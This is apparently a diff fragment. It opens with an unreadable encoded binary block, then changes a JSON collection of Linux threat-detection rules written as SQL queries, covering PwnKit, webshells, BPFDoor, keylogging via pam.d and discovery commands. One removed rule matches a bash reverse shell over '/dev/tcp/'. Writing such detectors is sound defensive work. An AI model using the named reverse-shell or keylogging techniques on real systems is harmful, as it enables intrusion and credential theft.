zwUU-fS*Ymm9W3zmAd)RK>m7F2u1i2^mIOS>+(Sy5dWa_4UvmDITt zsPBfrpIx+J$y)>s$xSQx?GNnfZ)m+t@2LxV-{!9Wf$^_5=s|KecVrr&rm)Qu#mR3L zq7sjyzzdGf4$B96$25>v>=3Hy$xEA#G~HCvw~Bqy!dB0}w@{DYeMsC{FBr7^NDVmR zf%};xO=}4lmdAIz*R+O$L;adNa;%&0e~?Y=oK2_CYDdGaNJ0`~RXC*y%CC$%vlPt! zHKFh21JO*GbP;1xm`jc{SQe%-M^H-T+|>35ZmZ=UpAgF!|50oF$s@UT7fmk6pXlK6 zoEghGd8mB&-ZK~f#%XXASRU`0o``}d@aGMt#xV`x|J6aRZYvyL_Z-W)%$L;fVW`%- zlRZ0g#sPJY%kay1^=#}Ls`U^Zq=F+^*$@tyiFh{dLx?Q`F7IB+VkL684D5Rz#w587w<+>s`6W6w>+w~1w5Sl z(6P=u5YjX4fYt9^YwpHe2TMCRLKVJmYxjHGBWx5gmo>0@*?I`WB|6Zo&wUImw?dU( zopVp;v|-=7syu%yP5{Tn=PBOrJmbV^0a=%d22NlS3Mp^ah2)) zvyd&`BR$VY!Uz|%E#x~?^n+Ia|df+qKT#+F(#cK2I#*iRbp%%8O zuk$ZYuu4FqS&IrV?o|cb7 zjJ<&QKisN@AE%tqCzuIxfLO6l;-J-wK zgjJ1QgABHt&1ebNLVrg4g|`bCX8r&)PkK6qSQdNQ=mB3t);Z}S_k|=_mv1V29Ivhz z>_PmR2y6j+O18eW&N?n~CMGWOywbR#E2LM2Bz|hnFT}o5uzNVR>c3r==u>GBVyzPF z7+nSLV{VT>Wxq39xsZ65oRGQyaIJPxwZw#R`eZ4#>*rP+Hrpng3BCggvsldpPJxpjDo932$P|gN8XgNdZao7$cn8KUJ!k>-Hk^RPds$U{+>cI3N$E zsGGLpdm1&B^xMNK1gw7QXHEdfap2Saocy;?ztMX`ug=9rAYSXMo1U=!qAkC|G)C?& zK&mourI#qCD98RLRjVo|sjfT}QtN7&Q^=e~%Kt;v@#k1m9bjGyh1F6zvQnGk=tBcH zp|6>aC>Zi%YE4i2;K8CppUDWLu5IB%iJh2|-Yayu4{86F39kc@%Qsz0zkW{=gB{qK1zpRN-{rNYn##=M z_R5d0@}8KGUA8X0EpKngsyMd=3hEc)*uAgm>dBv-+zj zRCd((oz~RHOaqHy@O8o~`$|lbH65V(*ARfv%C{56qz!?mN}M9hHTSWW*2tO2Qps-p zE2($S$vOYxehvs#m2N@wbzARf0CQg!D?JOAovNtgM&jh);&U-JFK`gfy|FdCWQ^)l z>QZ+`(gPTRGdQ|2KPQz{5N^jZ!<#bwb4Ty6p7ZbvZf`)JSr+4(KQcu<{p#LYYgvGv z_tS&k=S)%Cok)Hy%9J!^2Z9Idm1Cs!4=WwQlymV=Av1nYN8=b90Rmb|ue;_Q`u+D7 zGM*gdW4ZdGOH+jx96@gKdx?56M)}$kPh!DMW)C2-i1(wSG;Ceh?gJaa|9L*0Oxun2 zbR;x(c1pn>!On&wRU%VM_@AKwCHwYeI(CYc+4@+PZ+IHbJAARJ73+gGfy2pGFxU|E zD&nC2i#*BATX$3xNayks8{4NUNhIy4^!7|jYC+c!pIUgVX|We~$gT-ams4EHLYzWlZfEH$?aHaJ^32D)U+(8{XhcP6MsRcMULD7)2^DE0wxOO|!UGn0x zq$(#%pNm^0G=hxXEn;1(DUNy4Sf&mNBeC`+S zBXC3X^-w80+4OxgmoT3Qn?}T82A^Sxal!!el(^JH?U|(`wB)0k9SZN?IxQo)h!lSW z_tmlLGouC?{@N&UYn8=%Q`i|GhISzext6FavE1ZJBG=hw>C zELpRIAH=sJP3(Sm3V{ad(%#*Sagbf>V;*Pxl!{E!N@3ox?bH~i!-g4R8D3|ZR)_?U z^P9iDLU40=AjSBZ&#=ChD&3-`zMl|9g_g3I`&-#7^g%RR+?{dGyN~(?Td@I7 ziRAK}2>1e4ku-G8nHsUebm&wGr28d=6>PI+BxFGmZ?o4Uoy~AnTCTnIN+e2$2Cf5* z2GwojHZQT;?O4|OS^hT99QWNL|J(&UlWYaj&a1e#6J0n;{EZA>8maB$FS(S$oZE?N zzmQOLCLnv0>1%m)BTUN5h%c;pzHd!oWkF{)q<`FE?woROyj>x z)TsbmtqoU82&$}PWBlTvomFirq-RP_K4y`5ru+HN%&hC2&lYsH-aT+ni2f2FsbEmp z2f;WXdc&n<+bOs<=smZMn~UV6Ffw#_NG#^f^@T(>i^x0b+qG{fnw0|~bQ1$1P)Epx z68hX6OH3y_TIRbM?*s)>ZcivlFP=W^V5zX9X05e*G+$?VcpF=r_WJ`6-pz6r~w-u?dMBU776 zbn?-zR^w$VYD3{c`zbj93zT{Js|>P{@avc+%|*y(sT(E46U`uY?<@|ZP7uo9kSz7Y zpOnVxvVUyd#x!T-rL|KUGao!^x^gBcF_W zWHLS@XE;d_f;M^bmI5}BBwfBG5xh+&TZP`!$xVIT$k>hp`gnQ(!9f_*H896PVFkOd zdIVY^03XnzH)qi69&44?Gg(eII(K&W>DK{jaG_-BmLJZWbn`NoOr3?g_3-EO_G9TP z!!xIR;E!c% zXcVxs)4<5gmt4ikX;a5S3pLg{|1D`da1Rg*+3?D4)fG0U{CY7u=xBOlK^}QdkSLgU zDyPmU0ymRUaP?wIm5rbes2sDv2z!BOS(A^V-s_Bwvu&lKDAwM1g+&yZW?=k6T@91yb_@8u~;V zh=z@*?JH>}W-tg5U^j2hlF9T4>-G*&udxpKHYVv19T(2IJ~EmE>a2g?x@<_E|=Ead+g{wCi1e>yA&EA#*DB#HKh(M4T;{1O`l zPcC37u^!&aul8$VaQiE3H$(#qVS`>=5LhtU9U|0^KwQar{?=VXv!{>VvWHS(SEz2_ zx5yB&*j%&L-Q2@^aquDdmH9&iaN+X>fM%V{PUk(!Iq>N|f=3ztmk=*S2F%ja1&9QS z>SuHM6t*ae?JyKuIc9Td`GV+>A~P2dAzw)RVbuPkO82mYQopg*Z)vxBBoWmU@?M?V z-OGfsiPesOv&L1o;tl&@GaR-wF9+sQRm!SCiUq?OfjuB+NWr?zDrQWK{cqX+4$Sq4gT{P+%(bS_6~pk z*~hk6ry3YOXMI(z^#LD<$Mf_8;6JX_=-nsL%xPGo)2Am5%~=>(8`6HItxn>ZGu+Xz z=4$oQnPMHvqD<`a1hM$0|+F)72++Cas49v?eM|@USTl?S|8xjFwoh zm~hiP(xWFShLcw(ZH+e4p3{)$7;EIHCTB^_4%R-5%zAZm zG!qOm45~)^sydLd-%{BAN`EQ;EkL?@dK&p$Gwd?az#^Fp``6zJUkO~iQLf9_OH#@H zk?=Ekl}LVesI&~-it8CVur61IwVwq)2wnTT2~u#&UR@_bR%);&Q}!VQOc z&0eg20Ll&~hSNJ>_!f<99K9a3@n%d$mx|k>r=t;Fy_C(hT-e(7Nl+(5mJkg$ARG|g zDq?vV31?=Kq&6krD)(D1MK$1F<_dpTor~rP*3lPR9t;s{#5vbb{b-MIAz{Gzi60k( zq+ghfCREqYJuPz$v z-NP8G4jhdEYb`;(;PKY&h=m#x>;Y47^z>iCDP^biCCrlGG)ra7{<>Z&R)>p^ZuQ9Q zB&wp~M~r6#=+M&3$X7@0EY{5_k8w+{QiJ-wTmhQ?6>S6_^K_SV)<>*K_-%qtKaT=@ zR5b#5ef{bjKwqCS>%q_0=K^?T;-*l*vY7qI^O$44WbU03TWB7%#V9O*K^L%^WHxew zr)!}x>?v2voZ5Y2TBHIAdcP6W`A1K8?yPTd)&`swa7e-pkmyZIcB+UYewhhyEm1-a zy#j2f)NZIxldkhZCrR?DQOQoUGOI>ew2&UTFr(B)1ZJ}j%R5@&012QBW9$77(p0*N z5~gOZI(^PsaQ@p>=Di&<)8f(^JV2qkdHUN;>7DW4?srLEmehvAK4(B;vh^2 zS@^-ya}?-xy}mj!It~H_5Ob}R`I7Jl4**cKN-ur$uaI{r;F)4Unuc+B%>8E896vi5 zwh3cUn`rQ|0zON0FfNB?bna<8;Q<|AHdo1r?sT-M1q}_xYtIO}I;6je{`N)-E0;^R zt0l#UvhF2o(0}q;Zvn%zG*KX&NF2a62ks0X+^$3$GJVbCHrPZwYeHHv$!=2&vj8ZG zN%>3p&uCNbKK?g4%RStipe#E!h$dA#e`{iFc5tm}bsQ9i2uu%nO>aSsKQ3HrA$EHa zlNXMR@VNT9U~I#jFdQWtlRO~VAv|fpz@C~zE_fGKwqi!jCIq9?FIhKP2S9V!#((-C z_*`m0KzO#$JRKdJHQXv!PCTXsvjP4V-Iu8~ku>wQJ8vsu8iIFC5e;LLJw+*rC!<4P z?$zd)6`Sf~@qBoUWMecbLLQ_i7n$Jkd#YjFB0W--E4E zmR#3`P^1A3U4L@}?OHwS;z+cyVnhjy3EoPdiSJf505uWWeDRasA&#J_@_=Ch->;QgF!lJOq5GlBIf<2D8R=dyR+cmwOLG+k3m)MSBW&5tt z2wj+UTDbi+x?YE8SRm8&O^dClD=h$`nZ&sU^8{wlWocXgED+~3&r>5(?VqaqMHyXM z?k_=S?`;GJjUtIAqA4KmShk8-deKUXoEx+Suo`0yyn4+w;<=nX+WW60J|p0xvBCC7tJv@D z)r5~$QKA}6_h%ru7{K2G_5Gwx0rgqHXoBa28~0tUQbShAYZ&yt$` z?+%la$KoHTj3uK`c5L>eG;eQv?_t~*c+H*h6hKEj($)Y$Ie_`szxTwG@^hnRPX3ya zA3&-!Zrm@gZ4p;A#?czO5$1{Ql{zH5bZS}aKGa)PhD7;S@8=%WubnAc z;a|2oi~y@B-00eAEO+Xu=Sy;XI?}^%)PskN$EonkbbnqX&Isz5o2sq88T~Hjn`xOZ z=jdMPv_UL8vAF&gIjywcT$`Fch@BkDb;qd>Oa#MU|L)ND&M$Zhr#qLUZh;<)UE?)I zi9jcfdZf(22^4U98DnEDb9{|`)8qrR{HSx$3IN0B+?1jZg#G6@hnBy#Pj%Tf<{0kDaLJdPL6%1M>bDvt4$lGViuRj?#d%QG?vJI4z0&@R@?1!ctyY8 zo3)a-332z>Qy>~6imjMID;=XegTlDvzRh(>Bb{E&fe9N7%}@N|#&hUJ?2lxM)4fD? zSb(~lh`3R6cP)G${|Y_*BrScJ24A5;!kff(ams}4nFmTS)-u;*ZdiIu^)qnQ zV*1|-W+~nwPhnWKipuGMEJ?B`>(4B9mtI9kuQXcpf;iaxA`wp!x;LQDh=IY;Zs{D6 z<`5rNlN zKFvKyKF@ZdWgystb0qphOWx(*l^^0zUk43yP@e7-g8e4`_3SfU9 z2$rl$y@d_UKax*<^)O|G$tb@_<}e`NM@7j=*&;HRSFT(^Vholgxc1rjbQ$6h*IFxY zuF%OLW|BvX$S&>Mj!7Y)XR`k;F00sfJnI0GF_>#a!ne(t89lsZ)IG|}hV=J&C%Cdw zQ#d!e;TD~~Vq8jH%#~@c(c$xVETI2B$j}en3HY%0blWrN7co#+-k;jnEWep)xc)q5 zeEGWqRO^;=1=K`{;sUGWgIjcZX)IxAAD#OBA7jycT%p^;P#dC4hmlqP2gBP7J(m38 zBc|OUM6|a#Tf+^xgcS24B!$0nkc}0JvZRWCJjt-z#CQhOfhM0^Om}OSC_u7+eO(bZ z^d(_NC@%g8iuzxk#FYIvm4@V{7U%#_%@R=m~5^LM`!MGwY6TSG~M z$n?k$!i)T<>fX<&(h8yBv9-uY6l+ctyY%A4{@bn;lRN1aUTj|O2S6%Png78nI7;iU z2+f0pt8y>{1wJGm47ah_49_032lg72k3ong6+21k`~#lgz5^v&^mh|W_1~xC^1=tR zIfXxiV{AcxoZb-spTgcMEb6HH-&Rn%OOOWX9=b)kqy`vTN1=wZBC;;$Z+lj6NE7-A ztayx?Bxwaif0&43K~zU?4|Zlu`&dGE^c;?qp}<|Tj)lPKSBAN;S3H#(SMtLt9f`>! zK+Mk!M{3UHM|sYrbCdSOFONVw)9|gbcXpzFHyXCP&hm;MKJrQ$g=TojDX|%kIl57 zHRkzfJZdb7m_?ksqRejFf2{MnI+%n`mB} zvx4-;b=Uz*m}tQ0WUqVJTFVTw;o}zozfuYO?m)8q{C+G*l0_nd6IusdShsh#HW~~` zIP}=`>Ur<#HHH?$Xu;#k-8=00VIMLm%oXn#e1Akt`jWo&p2{v>y45FkP|4dHfX>IY zHM$-47U^bgrAA4UBhRX*r6?VnNcyXscPmZHbn&sEqnGq~R~zIqcCj+@g6L&(%9S`O zCDPn?UhNqOs0sYoa}GtCntQRkW${z02pqw-8FxrcKt@;k3^oezK^qThC+n^L3pk&!0DRA19NuDS6lQ z=01yDIO9;A4fSBxmO^lF&{bH2VKS?2;bmgG=II34>k@g(2oFB+?#~wT0D2oelxM+rMVR5245arsqi^NWw z-~{he^x8$E;BK(shA#0ojrG%4 z7+(=Ho1lqf#j)-!3;_k|zb!U*EVVj!rSfJ%?P}<SvU7)*|colp-&><9>GZ< zf1oL}n!Wde2s}sN?EhS~nkPL;dh$;S{=4~n)L`YAW$;o$q}p^|ogj2hu8MoDvcc0V zT1ekG(ZR0Y+g@I{ITsmpRO44FXvW;X%pg7(iVsY{O}nQ%CtH7B9c~`43KLaSf(6f9 z`H6>-m+ZZd(h^U9;J?bd=I2z$3bs5ellV=b6h9L``arBbSju?BdU_;OAT;lKhZ4=2 zMVS&t2anRSMNvA4*dh=W;}>BjbM^SjdAbtOGcfa}Qgru5w&4X_oke#k;Vi@}r}OJ} z=nNpe;GE{3XEbc{8&p=#%FA1Zef}_y{6>pHr(vkn?OYbJ&vnk zt6Ns#iJN9TSkYBt_sM=y&hHTZqKw0qc2x^p%j&5^1R|%cWb3b$Ef3zXa(sja*ouo+ zhcXRnEBkIe5j-+~+);WG^NTV&Hh%V;7X*lxHF8TQf2~#d2^$MUX+Uz0*`*|mwt4kE zQreEACIVG8@;&-#giTwlKYl<4NBeZ>O(+e_oN{$KR-W%625W4H{0?OyZy7q6OhJe*0wc6=BwngpEO6b z3Vt^PBbBX0uxx<_)W7nL`?~RsDdj` zs*oPOHkFYU)WkR~Y$a-$BL9{c@G{IMUCE^;ryk2XRqmcN<>32ysrK>ejZXhh{*FIg z`K?0rrnBafF!nR8X_&E%y`e1)< z%TTq@soq}@igIoatW1l>Tqdg-M6+MwdCQ_bQ5FWFlk@qx?azNa@aJ1jhFro{uZ!8C zm~or(%fN9`yN&Ul_Pn#g06;F6@fAMDU<|_N>VE!r9K!?rq4v_r>1iAmYk*DNJAjiFyH0yWr7-YZvOV=)Wr)h~{-WayChZYq7`vS7 zsa2ntoLfR^lk^w(1MN{HY|NyrMSi;?pkmeddt^X7WmcEvlC!iO=HtwN#Ga3AmUNL_ z(pOs&O(akD4!i1-%B~h~qQ?fAhQ|r*hXI6+wm#z3H)Vs++7>w+%kKgt78})*mH8+$ zXH%CR08fwljm}?z_u+|cL_yefJyq(MnDeHz*ARA4PP`4ESBX2QRL*oO;)(df!5hrU zzPab-FfvqAI#XJetfsjh{*KnDKGROkwR*t9nYYaK&G&R`Cd%m$@5TJw_G}VE=AAjU zd)xd4tJX&BhG4Gp4u07WZcnenM}*A^tenL-zcc%WCV|?}x6c`{8|Za!z~%8Ig6a9H z_o5m63ap=i`TDBi4@1O7gY%t^ME{0-){N48DqT#Y105%wwEjZ=o-7q1+e=fhS2b6b z%qngCKtp;qAAiyq_8+C@JCoS5Dml`Ywq%KQjNPPCC%Adsi98$=Tl>R0vag;SWfJ=g zEHQdWu`ZIcB-hFPv+m?3nr^o4-_HWcWFvOz9ULOqm`OQ&bG5HRD3FM3p z96$sfZ^{9S)Gnu7HW))xKetG+!PC6oIJ zFn_bI;@ibL?W&F-h65j?1%V#|Q`idfa#!h-U^i-0QzFlZXojf#X1$8jIicu->la!Rn_oyLlzSDV zQF?N>2hze^;VQ7A@(vjx*OLNUHcoFxZs# z$jim<-nQ5}w`3BOHbv(I2N9i5n_o_qx_1MOd_iWsFo$oZC4mNWq}sBmaba@uA%`MW z&HKCe+|@$z{*7yORy=c+@oaKhQjBsGNs@29TyIEh;yc87l=Q)|=aEFHbX6$v_W%&j z9c8&;Z1RJTg{0^m%fp@nKL`OK+qu+`|L#Jz%A6^&QT#AIda;!M5oIP@S>GUUq=F*l z$?^F@G_=q@ke#eit|>o$Z|Gv@X}5>R&WNglMHlPGd#h-Nlt0vVtp3w#VdxgGsxxf- z0K^j$C?NSUSxxHY$G#lMM`I_tJRP9iAyDIlV2E3y(e?apxlbi+6(=GcSMh{4Txik- z%??K|+*O@6%*KMqwcf@;giLnG+lvpQu#3-2a*_UcyMLC9w~w^x5x=)Hh5EkUjlP@g=CTpxEOV^TApO^tbMQ_pph=&({N<3eOL`g5vrb~hjcT|>%= z26v~%=9;U>>&^v&45gUHF-~bjdo>?oVFdr60)a}aQRb1k>MEw5PQ*a=uRI+H*71OJ z7xLm5)pyFz&2N#qUXf2omd6l#?vrtGW7P~@;98r^GLl5u6L&?fWtfq~z+JGbsUl$V z0rsFW@fA9@|Ei&jgSDBoQ;#S3ymNj zcOpIqIl#-u{eQOG2z>)*LU|IuWs@;`%yg&8>p>FPq>lYy)%JI!XsJU%W-*l7WD#%~ zjHgGxqGoy9n4*|&%Mz8QDX8<~UB(12i2(PX{Eqce=0c9Q!@+0PW9~>W^S`ft{UlRc z4-gKUb|PV~4Me9xeMdO1SkA2iSYs(;YU+#<$x)nEB}dQ{2Zed>ebN^R!SN{eH;R=B zA;8EZgK?u z)yEtk&n9gDZQlL9vKX|Z!1als7+LmLk3@K3Chgk*8!p-`RB~K#np7MLAi#5IF_f7u!WLZQ(lnWbqGt6B+Qe*MA$hnC-liC8gj zbRr`oAeJFr^n)f*s@Ka;FF9!Qga5pwv{V4EsJ5%9Q&5gX(8zP`groP-R8f}GkhP36 zzkitNx3~AR@{dor^G0j-0DKpp);ogw73=jYQzn0si2Eo=Z=YYfUIQ!e=9b|5l@CQi z^`A^Bsm>joqWQTPCD})yiHY82M`q$CoKKgCmgkezjoXVtgK~Q2i0zuAE|H%_8h_KQ zZAa@<{ldaLQu#QAx4fRTTWy1n&(n{NJu)z9Rb-`7Nk!sQ=KKZX=JdYNrc5Z}5!lk( zkq|VfeF5vg+2%Ta!N6@HNg6dE{|>=v5Cti2RvuqMunot`eO~#mGxniCV(s4jXHO1ge9}ZCigY zSkZ7mt0B(S!inI@m*=B`8e4I8pN<#@vI=T!lPG=5by6|B0@8*SKpW`BVOV_Ik|X3YN&# zR)4B{n!h9kAT)J(IrWX)X76*9j%em``E)w(MnRvdCQxaaO@?dGCgTVT# z8O;g`y|(fVFiubxJu|(~!H&!mSb>_-iaqd@ef2?4`{MG-{~FbUe7me)E(R^bsNS6Q zo;aTi-e;w-x1W&Q*rVeVH8#JpeWSohuB5-!^=?%U`XCT^syuggfpv`-aBp)jz^d7Yx* zrFggY8R*}$5=^atsw`@}Nz2W?>Jc77Z>h9&+*Ix(E$pI`V@>^;$-6Xx*^|~<0M?hZ zxjYAqc=;(!y$)!?44TPPLQQKbdBa?-A2Rog8m#gKcH+7UW3`)I?EtMgun2TlAt`jq zeNJKr7A3w0)oXgm6!#nj3ebiT#&ZB^t$AnZOa$qjT z@cgO`9szIAv~;Y^3t!sPkZJYHV!uj-GZR8)y8B`={cL4yU2Iis?Q9Kg&q7JqqE&*{;aj}eSfiLT!mZOPJ+sT)D{noa|9Y9B= zXw>!T)Ckqv(3Lz-C^5;n{M37Dr>`QDf{R4iOK|nhtaR*i^tV}P1@-8mau#D_2*ZBO zhGMeq^2-{-4?vn8l1)c>xz62U*?~xwK3RE z9?x|!03CRS`LtHPO#@TG!C$Juzynreux}%l$`R&+eSbk!8*1Z^$G<`4DaNm>h^$iP z)5bRAc~lszqZKwb-_wbzSE==@CS)=+gCw`uE3Y=z!v5?n7xPPa_A@acs8 zql8J}EdDjG+>*PadvVZvXotfr?!JE~Nx-4q#p`v!Ye9*(@P`ouMg@?h16rIOvFQuZ za0l-iQjx{D9DTG}E-6~v->!X){$&ey&DLnCZks|=)G(@72$jPP8^LrnY7R-h;J26^ zhTl_n*3-W=882PPey$+Ci^@IinXgiBQ6n?N)7p}K=~0t`XxsUA8iEN$M^2*Ez!y^P-IXD(K|8}cl>KV z2vULUfctmhzo~5UiW7vK=jt?!Z<<0kllrl%&ZVG-lc2? z9Woi3{SIN(%IGVWr}I}k94J`#0l8UjFOnsxEHXz%5b{U=o-csjuUvibal(hFAZ7ZQXVe;R|mt>@_>JZPj1)X>k`bc$xzivoaQkn$mCA_LdUK_7Jys>%LW< z*GEm>%A3?hP;45%aTw>ftz-4b9!ah251SkOiz|$k>se9 zcY!}!{K1tw_BiUtE%(*wCXY!Zl+V7GUJ?e+A<+gWQh9t*?o=_U zOg^AZ$k@=xJzDK!Wsxr1-OxKM)XTUT%6DE8M(nza$V<=XKHJM(<+Q{$#DwD)yAMs$ zI%#jj`rNg~$W;SNrn?thxr%PrvG zq9}`IaAMQ!_A9b7X|`-QVl?o}C<%w=Ky~|vFLePS=LGBxITS2E{viRDKVgW*61&SA zqHCv2mg~M?KqN1}knKbE*Q5oQ!9Nh##GXQ6KcCaBn^P{mw5*wB&Wa7F*=x-qKZVoM z_mK`{ETkOY15LE^t!Z8}&6V8D6s!WV#dJsEtga1Uc1W)5ac&Qlf3o9VSfK3w{3ngD zpv@boZjn`G6e(2YmSc1+)cQ8}Y4GN| z&^guQwM0)}1nE*~Zt3(=8;C$c(S@Q4*@(A&p3Y&o}`2{`;3k#Z?g3N?@13n7rIvx&}Nnyfh%A|BiWreE-M8$v>$FR@I>ReTtARS}cEOSv(FwuUNqdvQ*j9vj_)`NQ2&;vrDJ;i&=1REs3A@>MvC#-~VuK_4d9kU%oqj7T;fR ze%j^=#)HAW20KJ`2%&X3zQXyfLSa)D{GIi(8P6i(tI%+#23V|$1E`Z$`!$M5?3IUm zmrH$T{sP6!8>{ovfj{jmzI0=l9ffoOVW?>X5ncO&rv2KDr_VuR2;a-$B!UT6-OsSo(pI{J<_& zSiMTC1Y5r(i^euyk^*6;nks6%;>f!Z@wr2mtmrA>LHXKRrh8tj7p@81WMQ8$aJq6* zlmL7Zg|doSL#7xdF;AgF<$c>w;i*Icb$!*^D;GVkpQ5cL?u;C}&-dds^_WF#d=LJZ z4k)c%SPL;V4kC3c=01TnJcP^ZUs@uEg{YNJX!nGH(9N3{BfzSDMqq)^+nN&&iB8vs zmy&B@VliH!^{Y4w5mqN+#_dr;BwVY+EwO^9#L1_>F13bxp&nRo*60kQl^s|(r5_76 zR-6n2*c^$c*SyNxPaE(BS3j3`!yqA3DN*yMLPtHm4b-?RQW^eXC)`vWd5|Ec6Ht>n zkUn#QBCx{I0>rqVaBi8>3#=-Ng}6fEtazwrRt(vDy>F1NSA5yqIfTfp)@*$uolmeO zet%%^R2-jY-F|GE8~NszJ%1pFC=(w=oi`J`kikT#=LovVm|RE$Sncoa;-pBUDY;(} z@*s7oADbeKE+wL65VGdgf>*MLM*{WZCZQ5T*q@3%;C>YX*%aE1TmNDE+vc3oDqkp> zLO_kts8p|qkx8)@KDmJ5EfrCXglu zF0CA9RQtYXP~6{@e>e5X=_k02BT=j1&cMbgC$lXj<8#}b!@Y?|m<;+UF0KDY&i`H; mou%p5{~Z7GC*tg4>g3|#Wce9GK!96NKp2C8K~_x; 3" + "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/var/run/haldrund.pid', '/var/run/xinetd.lock', '/var/run/kdevrund.pid'))" ], - "filename": "lnx_auth_susp_failed_logons_single_source.yml" + "filename": "lnx_auditd_bpfdoor_file_accessed.yml" }, { - "title": "PwnKit Local Privilege Escalation", - "id": "0506a799-698b-43b4-85a1-ac4c84c720e9", - "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", - "author": "Sreeman", + "title": "Password Policy Discovery", + "id": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "description": "Detects password policy discovery commands", + "author": "Ömer Günal, oscd.community, Pawel Mazur", "tags": [ - "attack.privilege_escalation", - "attack.t1548.001" + "attack.discovery", + "attack.t1201" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ( = 'pkexec' AND = 'The value for environment variable XAUTHORITY contains suscipious content' AND = '[USER=root] [TTY=/dev/pts/0]')" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/common-password', '/etc/security/pwquality.conf', '/etc/pam.d/system-auth', '/etc/login.defs')) OR (type = 'EXECVE' AND a0 = 'chage' AND a1 IN ('--list', '-l')) OR (type = 'EXECVE' AND a0 = 'passwd' AND a1 IN ('-S', '--status')))" ], - "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml" + "filename": "lnx_auditd_password_policy_discovery.yml" }, { - "title": "Guacamole Two Users Sharing Session Anomaly", - "id": "1edd77db-0669-4fef-9598-165bda82826d", - "description": "Detects suspicious session with two users present", - "author": "Florian Roth (Nextron Systems)", + "title": "Webshell Remote Command Execution", + "id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "description": "Detects possible command execution by web application/web shell", + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Crazy web applications" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE logs MATCH ('\"(2 users now present)\"')" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND syscall = 'execve' AND key LIKE 'detect\\_execve\\_www' ESCAPE '\\')" ], - "filename": "lnx_guacamole_susp_guacamole.yml" + "filename": "lnx_auditd_web_rce.yml" }, { - "title": "Suspicious Log Entries", - "id": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", - "description": "Detects suspicious log entries in Linux log files", - "author": "Florian Roth (Nextron Systems)", + "title": "Use Of Hidden Paths Or Files", + "id": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", + "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", + "author": "David Burkett, @signalblur", "tags": [ - "attack.impact" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"entered promiscuous mode\" OR \"Deactivating service\" OR \"Oversized packet received from\" OR \"imuxsock begins to drop messages\"'))" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name LIKE '%/.%' ESCAPE '\\') AND NOT ((name LIKE '%/.cache/%' ESCAPE '\\' OR name LIKE '%/.config/%' ESCAPE '\\' OR name LIKE '%/.pyenv/%' ESCAPE '\\' OR name LIKE '%/.rustup/toolchains%' ESCAPE '\\')))" ], - "filename": "lnx_shell_susp_log_entries.yml" + "filename": "lnx_auditd_hidden_binary_execution.yml" }, { - "title": "JexBoss Command Sequence", - "id": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", - "description": "Detects suspicious command sequence that JexBoss", - "author": "Florian Roth (Nextron Systems)", + "title": "Data Compressed", + "id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.004" + "attack.exfiltration", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of archiving tools by legitimate user." + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'zip') OR (type = 'execve' AND a0 = 'gzip' AND a1 = '-f') OR (type = 'execve' AND a0 = 'tar' AND a1 LIKE '%-c%' ESCAPE '\\'))" + ], + "filename": "lnx_auditd_data_compressed.yml" + }, + { + "title": "Linux Keylogging with Pam.d", + "id": "49aae26c-450e-448b-911d-b3c13d178dfc", + "description": "Detect attempt to enable auditing of TTY input", + "author": "Pawel Mazur", + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ], + "falsepositives": [ + "Administrative work" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"bash -c /bin/bash\" AND \"&/dev/tcp/\"'))" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/system-auth', '/etc/pam.d/password-auth')) OR (type LIKE 'TTY' ESCAPE '\\' OR type LIKE 'USER\\_TTY' ESCAPE '\\'))" ], - "filename": "lnx_susp_jexboss.yml" + "filename": "lnx_auditd_keylogging_with_pam_d.yml" }, { - "title": "Modifying Crontab", - "id": "af202fd3-7bff-4212-a25a-fb34606cfcbe", - "description": "Detects suspicious modification of crontab file.", + "title": "System Information Discovery - Auditd", + "id": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "description": "Detects System Information Discovery commands", "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1053.003" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Legitimate modification of crontab" + "Likely" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE logs MATCH ('\"REPLACE\"')" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/lsb-release', '/etc/redhat-release', '/etc/issue')) OR (type = 'EXECVE' AND a0 IN ('uname', 'uptime', 'lsmod', 'hostname', 'env')) OR (type = 'EXECVE' AND a0 = 'grep' AND (a1 LIKE '%vbox%' ESCAPE '\\' OR a1 LIKE '%vm%' ESCAPE '\\' OR a1 LIKE '%xen%' ESCAPE '\\' OR a1 LIKE '%virtio%' ESCAPE '\\' OR a1 LIKE '%hv%' ESCAPE '\\')) OR (type = 'EXECVE' AND a0 = 'kmod' AND a1 = 'list'))" ], - "filename": "lnx_cron_crontab_file_modification.yml" + "filename": "lnx_auditd_system_info_discovery.yml" }, { - "title": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", - "id": 